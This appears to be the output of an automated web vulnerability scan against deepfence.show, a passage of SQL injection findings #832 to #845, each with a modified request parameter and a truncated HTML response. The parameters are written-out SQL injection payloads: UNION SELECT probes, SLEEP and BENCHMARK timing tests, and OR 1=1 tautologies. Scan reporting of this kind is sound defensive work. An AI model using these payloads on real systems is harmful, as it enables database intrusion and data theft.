href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #832\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #833\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #834\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #835\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #836\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #837\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #838\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #839\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 29#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #840\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #841Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR '1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #842\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" OR 1 = 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #843\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #844\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT USER()--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #845\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 